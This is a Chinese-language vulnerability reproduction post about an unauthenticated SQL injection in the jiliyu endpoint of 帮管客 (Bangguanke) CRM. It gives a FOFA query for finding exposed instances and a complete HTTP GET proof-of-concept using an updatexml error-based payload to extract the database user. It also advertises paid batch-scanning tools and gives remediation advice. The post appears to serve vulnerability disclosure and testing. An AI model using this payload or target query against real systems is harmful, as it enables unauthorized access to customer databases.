帮管客 CRM jiliyu SQL注入漏洞复现

0x01 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！

0x02 产品介绍

帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统，客户管理，从未如此简单，一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化数据分析帮管客颠覆传统，重新定义企业管理系统。

0x03 漏洞威胁

帮管客CRM 客户管理系统/index.php/jiliyu 接口存在 sql 注入漏洞，未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。

0x04 漏洞环境

FOFA：app="帮管客-CRM"

0x05 漏洞复现

POC

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

查询当前用户

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球：冷漠安全

0x07 修复建议

官方已发布安全版本，请用户联系厂商修复漏洞：https://www.bgk100.com/

部署Web应用防火墙，对数据库操作进行监控。

如非必要，禁止公网访问该系统。

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球：冷漠安全
交个朋友，限时优惠券：加入立减25
星球福利：每天更新最新漏洞POC、资料文献、内部工具等